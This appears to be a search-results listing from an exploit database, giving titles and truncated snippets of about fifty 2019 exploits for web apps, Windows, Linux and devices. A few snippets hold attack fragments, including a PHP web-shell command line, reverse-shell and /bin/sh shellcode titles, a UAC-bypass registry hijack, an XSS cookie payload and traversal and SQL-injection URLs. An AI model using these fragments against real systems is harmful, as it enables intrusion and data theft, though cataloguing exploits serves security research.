39001 matches found
GSearch 1.0.1.0 - Denial of Service Exploit
Exploit Title: GSearch v1.0.1.0 - Denial of Service PoC Author: 0xB9 Twitter: @0xB9Sec Contact: 0xB9atpm.me Software Link: https://www.microsoft.com/store/productId/9NDTMZKLC693 Version: 1.0.1.0 Tested on: Windows 10 Proof of Concept: Run the python script, it will create a new file "PoC.txt" Cop...
GrandNode 4.40 - Path Traversal / Arbitrary File Download Vulnerabilities
Exploit for multiple platform in category web applications Exploit Title: GrandNode Path Traversal & Arbitrary File Download Unauthenticated Exploit Author: Corey Robinson https://twitter.com/CRobSec Vendor Homepage: https://grandnode.com/ Software Link:...
SAPIDO RB-1732 - Remote Command Execution Exploit
Exploit Title: SAPIDO RB-1732 command line execution Exploit Author: k1nm3n.aotoi Vendor Homepage: http://www.sapido.com.tw/ Software Link: http://www.sapido.com.tw/CH/data/Download/firmware/rb1732/tc/RB-1732TCv2.0.43.bin Version: RB-1732 V2.0.43 Tested on: linux import requests import sys def...
SeedDMS < 5.1.11 - (out.GroupMgr.php) Cross-Site Scripting Vulnerability
Exploit for php platform in category web applications Exploit Title: Persistent Cross-Site Scripting or Stored XSS in out/out.GroupMgr.php in SeedDMS before 5.1.11 Exploit Author: Nimit Jainhttps://secfolks.blogspot.com Vendor Homepage: https://www.seeddms.org Software Link:...
Mozilla Spidermonkey - IonMonkey (Array.prototype.pop) Type Confusion Exploit
The following program found through fuzzing and manually modified crashes Spidermonkey built from the current beta channel and Firefox 66.0.3 current stable: // Run with --no-threads for increased reliability const v4 = a: 0, a: 1, a: 2, a: 3, a: 4; function v7v8,v9 if v4.length == 0 v43 = a: 5; ...
WordPress Live Chat Unlimited 2.8.3 Plugin - Cross-Site Scripting Vulnerability
Exploit for php platform in category web applications Exploit Title: Live Chat Unlimited v2.8.3 Stored XSS Injection Google Dork: inurl:"wp-content/plugins/screets-lcx" Date: 2019/06/25 Exploit Author: m0ze Vendor Homepage: https://screets.com/ Software Link:...
BlogEngine.NET 3.3.6/3.3.7 - (path) Directory Traversal Vulnerability
Exploit for asp platform in category web applications Exploit Title: Directory Traversal on BlogEngine.NET Date: 24 Jun 2019 Exploit Author: Aaron Bishop Vendor Homepage: https://blogengine.io/ Version: v3.3.7 Tested on: 3.3.7, 3.3.6 CVE : 2019-10717 1. Description ============== BlogEngine.NET i...
SuperDoctor5 - (NRPE) Remote Code Execution Exploit
SuperMicro implemented a Remote Command Execution plugin in their implementation of NRPE in SuperDocter 5, which is their monitoring utility for SuperMicro chassis'. This is an intended feature but leaves the system open by default to unauthenticated remote command execution by abusing the...
WordPress iLive 1.0.4 Plugin - Cross-Site Scripting Vulnerability
Exploit for php platform in category web applications Exploit Title: iLive - Intelligent WordPress Live Chat Support Plugin v1.0.4 Stored XSS Injection Exploit Author: m0ze Vendor Homepage: http://www.ilive.wpapplab.com/ Software Link:...
Fortinet FCM-MB40 - Cross-Site Request Forgery / Remote Command Execution Exploit
Exploit for hardware platform in category web applications Exploit Title: FCM-MB40 Remote Command Execution as Root via CSRF Date: 2019-06-19 Exploit Author: @XORcat Vendor Homepage: https://fortinet.com/ Software Link: Customer Account Required Version: v1.2.0.0 Tested on: Linux CVE : TBA !--...
SeedDMS versions < 5.1.11 - Remote Command Execution Exploit
Exploit for php platform in category web applications Exploit Title: Remote Command Execution through Unvalidated File Upload in SeedDMS versions "; $cmd = $REQUEST'cmd'; system$cmd; echo ""; die; ? Step 3: Now after uploading the file check the document id corresponding to the document. Step 4:...
Nagios XI Magpie_debug.php Root Remote Code Execution Exploit
This Metasploit module exploits two vulnerabilities in Nagios XI 5.5.6. One allows for unauthenticated remote code execution and another allows for local privilege escalation. When combined, these two vulnerabilities give us a root reverse shell. This module requires Metasploit:...
Coldfusion / JNBridge Remote Code Execution Exploit
Coldfusion versions 2016 and 2018 along with all current versions of JNBridge suffer from a remote code execution vulnerability. Product: Coldfusion/JNBridge Manufacturer: Adobe/JNBridge LLC Affected Versions: Coldfusion 2016,2018, JNBridge all versions Tested Versions: 2018 Vulnerability Type:...
Linux/x86_64 - Reverse(0.0.0.0:4444/TCP) Shell (/bin/sh) Shellcode (70 bytes)
/ Title: Linux/x8664 - Reverse0.0.0.0:4444/TCPShell/bin/sh- Null Free Shellcode ;Author: Aron Mihaljevic ;Architecture: Linux x8664 ;Shellcode Length: 70 bytes ;github = https://github.com/STARRBOY compilation and execution of assembly code ------------------------------------- nasm -felf64...
Microsoft Windows Font Cache Service - Insecure Sections Privilege Escalation Exploit
Windows: Windows Font Cache Service Insecure Sections EoP Platform: Windows 10 1809 not tested earlier Class: Elevation of Privilege Security Boundary per Windows Security Service Criteria: User boundary Summary: The Windows Font Cache Service exposes section objects insecurely to low privileged...
Microsoft Windows - CmpAddRemoveContainerToCLFSLog Arbitrary File/Directory Creation Exploit
Windows: CmpAddRemoveContainerToCLFSLog Arbitrary File/Directory Creation EoP Platform: Windows 10 1809 not tested earlier Class: Elevation of Privilege Security Boundary per Windows Security Service Criteria: User boundary Summary: The kernel’s CmpAddRemoveContainerToCLFSLog function doesn’t...
EA Origin < 10.5.38 - Remote Code Execution Vulnerability
Exploit Title: EA Origin 10.5.38 Remote Code Execution Date: 05/22/2019 Exploit Author: Dominik Penner @zer0pwn Vendor Homepage: https://www.origin.com Software Link: https://www.origin.com/can/en-us/store/download Version: 10.5.38 and below Tested on: Windows 7, Windows 8, Windows 10 CVE :...
Tuneclone 2.20 - Local SEH Buffer Overflow Exploit
Exploit for windows platform in category local exploits Exploit Title: TuneClone Local Seh Exploit Date: 19.06.2019 Vendor Homepage: http://www.tuneclone.com/ Software Link: http://www.tuneclone.com/tuneclonesetup.exe Exploit Author: Achilles Tested Version: 2.20 Tested on: Windows XP SP3 EN 1.-...
WebERP 4.15 - SQL injection Exploit
Exploit for php platform in category web applications Exploit Title: Blind SQL injection in WebERP. Exploit Author: Semen Alexandrovich Lyhin https://www.linkedin.com/in/semenlyhin/ Vendor Homepage: http://www.weberp.org/ Version: 4.15 A malicious query can be sent in base64 encoding to unseriali...
BlogEngine.NET 3.3.6/3.3.7 - XML External Entity Injection Exploit
Exploit for asp platform in category web applications Exploit Title: Out-of-band XML External Entity Injection on BlogEngine.NET Exploit Author: Aaron Bishop Vendor Homepage: https://blogengine.io/ Version: v3.3.7 Tested on: 3.3.7, 3.3.6 CVE : 2019-10718 1. Description ============== BlogEngine.N...
Linux - Use-After-Free via race Between modify_ldt() and #BR Exception Exploit
/ When a BR exception is raised because of an MPX bounds violation, Linux parses the faulting instruction and computes the linear address of its memory operand. If the userspace instruction is in 32-bit code, this involves looking up the correct segment descriptor and adding the segment offset to...
Cisco Prime Infrastructure Health Monitor TarArchive Directory Traversal Exploit
This Metasploit module exploits a vulnerability found in Cisco Prime Infrastructure. The issue is that the TarArchive Java class the HA Health Monitor component uses does not check for any directory traversals while unpacking a Tar file, which can be abused by a remote user to leverage the...
Cisco Prime Infrastructure Runrshell Privilege Escalation Exploit
Exploit for hardware platform in category remote exploits This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'Cisco Prime Infrastructure Runrshell Privilege Escalation', 'Description' = %q This...
BlogEngine.NET 3.3.6/3.3.7 - theme Cookie Directory Traversal / Remote Code Execution Exploit
Exploit for asp platform in category web applications Exploit Title: Directory Traversal + RCE on BlogEngine.NET Date: 17 Jun 2019 Exploit Author: Aaron Bishop Vendor Homepage: https://blogengine.io/ Version: v3.3.7 Tested on: 3.3.7, 3.3.6 CVE : 2019-10720 1. Description ==============...
BlogEngine.NET 3.3.7 Directory Traversal / Remote Code Execution Vulnerability #RCE
BlogEngine.NET versions 3.3.7 and earlier are vulnerable to two separate directory traversal issues that can lead to remote code execution. BlogEngine.NET, versions 3.3.7 and earlier, is vulnerable to two separate Directory Traversal issues that can lead to Remote Code Execution. CVE-2019-10719...
Thunderbird ESR < 60.7.XXX - Type Confusion Vulnerability
Type confusion in Thunderbird ============================= Severity Rating: Medium Confirmed Affected Versions: All versions affected Confirmed Patched Versions: Thunderbird ESR 60.7.XXX Vendor: Thunderbird Vendor URL: https://www.thunderbird.net/ Vendor Reference:...
CleverDog Smart Camera DOG-2W / DOG-2W-V4 - Multiple Vulnerabilities
Exploit for hardware platform in category web applications 1. Advisory Information ======================================== Title: Clever Dog Smart Camera Vendor Homepage: http://www.cleverdog.com.cn/ Tested on Camera types : DOG-2W, DOG-2W-V4 Vulnerability: Hardware- Multiple Vulnerabilities Dat...
HC10 HC.Server Service 10.14 - Remote Invalid Pointer Write Vulnerability
Credits: John Page aka hyp3rlinx + Website: hyp3rlinx.altervista.org + Source: http://hyp3rlinx.altervista.org/advisories/HC10-HC.SERVER-10.14-REMOTE-INVALID-POINTER-WRITE.txt + ISR: ApparitionSec Vendor www.hostingcontroller.com Product HC10 HC.Server Service 10.14 HC10 is a unified hosting...
Spring Security OAuth - Open Redirector Vulnerability
Exploit for java platform in category web applications Exploit Title: Open Redirector in spring-security-oauth2 Exploit Author: Riemann Vendor Homepage: https://spring.io/projects/spring-security-oauth Software Link: https://spring.io Version: Spring Security OAuth versions 2.3 prior to 2.3.6...
RedwoodHQ 2.5.5 - Authentication Bypass Vulnerability
Exploit for multiple platform in category web applications -- encoding: utf-8 -- !/usr/bin/python3 Exploit Title: RedxploitHQ Create Admin User by missing authentication on db Date: 14-june-2019 Exploit Author: EthicalHCOP Version: 2.0 / 2.5.5 Vendor Homepage: https://redwoodhq.com/ Software Link...
Sahi pro 8.x - SQL Injection Vulnerability
Exploit for php platform in category web applications Exploit Title: Sahi pro :/s/dyn/pro/DBReports?sql=SELECT DISTINCT memoryused AS ROWSTATUS, SCRIPTREPORTS.SCRIPTREPORTID,SCRIPTREPORTS.SCRIPTNAME,SUITEREPORTS. FROM SUITEREPORTS,SCRIPTREPORTS 0day.today 2019-06-18...
Linux / FreeBSD TCP-Based Denial Of Service Vulnerability
Netflix has identified several TCP networking vulnerabilities in FreeBSD and Linux kernels. The vulnerabilities specifically relate to the minimum segment size MSS and TCP Selective Acknowledgement SACK capabilities. The most serious, dubbed "SACK Panic," allows a remotely-triggered kernel panic ...
Thunderbird ESR < 60.7.XXX - icalrecur_add_bydayrules Stack-Based Buffer Overflow Vulnerability
Stack-based buffer overflow in Thunderbird ========================================== Severity Rating: High Confirmed Affected Versions: All versions affected Confirmed Patched Versions: Thunderbird ESR 60.7.XXX Vendor: Thunderbird Vendor URL: https://www.thunderbird.net/ Vendor Reference:...
Serv-U FTP Server < 15.1.7 - Local Privilege Escalation Exploit
Exploit for linux platform in category local exploits / CVE-2019-12181 Serv-U 15.1.6 Privilege Escalation vulnerability found by: Guy Levin @vastart - twitter.com/vastart https://blog.vastart.dev to compile and run: gcc servu-pe-cve-2019-12181.c -o pe && ./pe / include include include int main ch...
AROX School-ERP Pro - Unauthenticated Remote Command Execution Exploit
This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule "AROX School-ERP Pro Unauthenticated Remote Code Execution", 'Description' = %q This module exploits a command execution vulnerability in AROX...
Sahi pro 7.x/8.x - Directory Traversal Vulnerability
Exploit for multiple platform in category web applications Exploit Title: Sahi pro :/s/dyn/Loghighlight?href=../../../../windows/win.ini&n=1selected 0day.today 2019-06-18...
Netperf 2.6.0 - Stack-Based Buffer Overflow Exploit
Exploit Author: Juan Sacco - http://exploitpack.com Tested on: Kali i686 GNU/Linux Description: Netperf 2.6.0 s a benchmark tool than developed by Helett Packard that can be used to measure the performance of many different types of networking. It provides tests for both unidirectional troughput...
Linux/x86_64 - execve(/bin/sh) Shellcode (22 bytes)
Title: Linux/x8664 - execve/bin/sh 22 bytes ;Author: Aron Mihaljevic ;Architecture: Linux x8664 ;Shellcode Length: 22 bytes ;github = https://github.com/STARRBOY ============ASM=========================== global start section .text start: ;int execveconst char filename, char const argv,char const...
Thunderbird ESR < 60.7.XXX - parser_get_next_char Heap-Based Buffer Overflow Vulnerability
Heap-based buffer overflow in Thunderbird ========================================= Severity Rating: High Confirmed Affected Versions: All versions affected Confirmed Patched Versions: Thunderbird ESR 60.7.XXX Vendor: Thunderbird Vendor URL: https://www.thunderbird.net/ Vendor Reference:...
Sahi pro 8.x - Cross-Site Scripting Vulnerability
Exploit for multiple platform in category web applications Exploit Title: Sahi pro alertdocument.cookie”.start; log“testing stored XSS injection”; $tc1.end; Step 2 : Execute the created script poc.sah using sahi GUI controller . Step 3 : navigate to the web logs console http://:/logs using the...
Thunderbird ESR < 60.7.XXX - icalmemorystrdupanddequote Heap-Based Buffer Overflow Vulnerability
Heap-based buffer overflow in Thunderbird ========================================= Severity Rating: High Confirmed Affected Versions: All versions affected Confirmed Patched Versions: Thunderbird ESR 60.7.XXX Vendor: Thunderbird Vendor URL: https://www.thunderbird.net/ Vendor Reference:...
Microsoft Windows - UAC Protection Bypass (Via Slui File Handler Hijack) (PowerShell) Exploit
Exploit for windows platform in category local exploits Interactive Version: function SluiHijackBypass Param ParameterMandatory=$True String$command, ValidateSet64,86 int$arch = 64 Create registry structure New-Item "HKCU:\Software\Classes\exefile\shell\open\command" -Force Set-ItemProperty -Path...
Linux/x86 - Reposition + INC encoder with execve(/bin/sh) Shellcode (66 bytes)
Title: Linux/x86 - Reposition + INC encoder with execve/bin/sh Shellcode 66 bytes Author: Jonathan So Purpose: decode and spawn a /bin/sh shell Tested On: Linux kali 4.19.0-kali4-686 1 SMP Debian 4.19.28-2kali1 2019-03-18 i686 GNU/Linux Arch: x86 Size: 66 bytes Write-up Link:...
Exim 4.91 Local Privilege Escalation Exploit
Exploit for linux platform in category local exploits !/bin/bash raptoreximwiz - "The Return of the WIZard" LPE exploit Copyright c 2019 Marco Ivaldi A flaw was found in Exim versions 4.87 to 4.91 inclusive. Improper validation of recipient address in delivermessage function in /src/deliver.c may...
Aida64 6.00.5100 - (Log to CSV File) Local SEH Buffer Overflow Exploit
Exploit for windows platform in category local exploits !/usr/bin/python Exploit : Aida64 6.00.5100 'Log to CSV File' Local SEH Buffer Overflow Exploit Author : Nipun Jaswal Tested On : Windows 7 Home Basicx86 Version : 6.00.5100 Vendor Homepage: https://www.aida64.com/downloads Software Link:...
CentOS 7.6 - ptrace_scope Privilege Escalation Exploit #RCE #LPE
Exploit for linux platform in category local exploits !/usr/bin/env bash 'ptracescope' misconfiguration Local Privilege Escalation Affected operating systems TESTED: Parrot Home/Workstation 4.6 Latest Version Parrot Security 4.6 Latest Version CentOS / RedHat 7.6 Latest Version Kali Linux 2018.4...
Pronestor Health Monitoring 8.1.11.0 - Privilege Escalation Vulnerability
Exploit for windows platform in category local exploits Pronestor Health Monitoring sc qc PNHM SERVICENAME: PNHM TYPE : 10 WIN32OWNPROCESS STARTTYPE : 2 AUTOSTART ERRORCONTROL : 1 NORM...
Sitecore 8.x - Deserialization Remote Code Execution Vulnerability
Exploit for asp platform in category web applications Exploit Title: Sitecore v 8.x Deserialization RCE Date: Reported to vendor October 2018, fix released April 2019. Exploit Author: Jarad Kopf Vendor Homepage: https://www.sitecore.com/ Software Link: Sitecore downloads:...
FusionPBX 4.4.3 - Remote Command Execution Exploit #RCE
Exploit for php platform in category web applications Exploit Title: FusionPBX = 4.4.3 Command Injection RCE via XSS Date: 06-11-2019 Exploit Author: Dustin Cobb Vendor Homepage: https://www.fusionpbx.com Software Link: https://https://github.com/fusionpbx/fusionpbx Version: = 4.4.3 Tested on:...
phpMyAdmin 4.8 - Cross-Site Request Forgery Vulnerability
Exploit for php platform in category web applications Exploit Title: Cross Site Request Forgery CSRF Exploit Author: Riemann Vendor Homepage: https://www.phpmyadmin.net/ Software Link: https://www.phpmyadmin.net/downloads/ Version: 4.8 Tested on: UBUNTU 16.04 LTS -Installed Docker image - docker...